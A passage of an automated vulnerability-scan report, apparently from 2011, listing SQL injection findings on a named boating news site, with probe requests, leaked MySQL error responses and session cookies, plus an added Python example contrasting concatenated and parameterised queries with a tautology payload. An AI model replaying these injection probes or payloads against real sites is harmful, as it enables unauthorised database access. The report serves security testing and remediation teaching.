User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
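
The remediation text above is the scanner's standard wording; the fragments in this report say more. Finding 1.108 fails near "' AND cookie_info=''" and finding 1.110 near "'/news/mishaps-a-rescues/272642-...?t", so the statement embeds the full request URI (query string included) together with cookie data, which is why the path, parameter names, parameter values and the count cookie all trigger the same error. Suppressing the error message alone hides the evidence but leaves the concatenation in place. The example below is added here and is not the site's code: Python with sqlite3 stands in for the PHP/MySQL stack shown in the response headers, the table and column names are assumptions, and it shows the string-built query beside a parameterised one, plus a handler that logs the driver error server-side and returns a generic page.

```python
import logging
import sqlite3

log = logging.getLogger("visits")


def open_db():
    """In-memory stand-in for the site's tracking table, with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (uri TEXT, cookie_info TEXT, hits INTEGER)")
    conn.execute("INSERT INTO visits VALUES ('/news/sailing', '5', 1)")
    return conn


def hits_vulnerable(conn, uri, cookie_info):
    """Statement built by string concatenation, the shape the report's error
    fragments suggest. Any quote in the request URI or cookie reaches the parser."""
    sql = f"SELECT hits FROM visits WHERE uri='{uri}' AND cookie_info='{cookie_info}'"
    return conn.execute(sql).fetchone()


def hits_hardened(conn, uri, cookie_info):
    """Same lookup with bound parameters: values travel separately from the
    statement text, so a quote is data, never syntax."""
    sql = "SELECT hits FROM visits WHERE uri=? AND cookie_info=?"
    return conn.execute(sql, (uri, cookie_info)).fetchone()


def handle_request(handler, conn, uri, cookie_info):
    """Handler wrapper: the driver's error goes to the server log only and the
    client gets a generic 500 page, so a probe such as ?1'=1 learns nothing
    about the statement."""
    try:
        row = handler(conn, uri, cookie_info)
    except sqlite3.Error as exc:
        log.error("database error for uri=%r cookie_info=%r: %s", uri, cookie_info, exc)
        return 500, "An internal error occurred."
    return 200, "hits=%d" % (row[0] if row else 0)


if __name__ == "__main__":
    db = open_db()
    probe = "/news/sailing?1'=1"          # the 1.108 payload, as the server sees the URI
    print(handle_request(hits_vulnerable, db, probe, "5"))  # 500; details only in the log
    print(handle_request(hits_hardened, db, probe, "5"))    # 200, hits=0: no such row
    # Beyond the leaked error: the concatenated statement lets a cookie value
    # rewrite the WHERE clause, while the bound version simply matches nothing.
    tautology = "x' OR '1'='1"
    print(hits_vulnerable(db, "/news/sailing", tautology))  # (1,)
    print(hits_hardened(db, "/news/sailing", tautology))    # None
```

The generic error page is the second half of the fix, not a substitute for the first: with the error hidden, the same concatenation is still exploitable blind (boolean or time-based), as the tautology call shows.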

1.109. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m6r6k5h7dhvssd9n0b3p4vupn1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1' AND c' at line 1</font>
...[SNIP]...

1.110. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page=' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?t' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page='' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.111. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [print parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The print parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the print parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1'&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1''&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.112. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [tmpl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component'&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component''&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.113. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/index.php?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues/index.php?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.114. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/sailing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/sailing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.115. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/todays-top-stories?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/todays-top-stories?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.116. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /resources?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.117. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

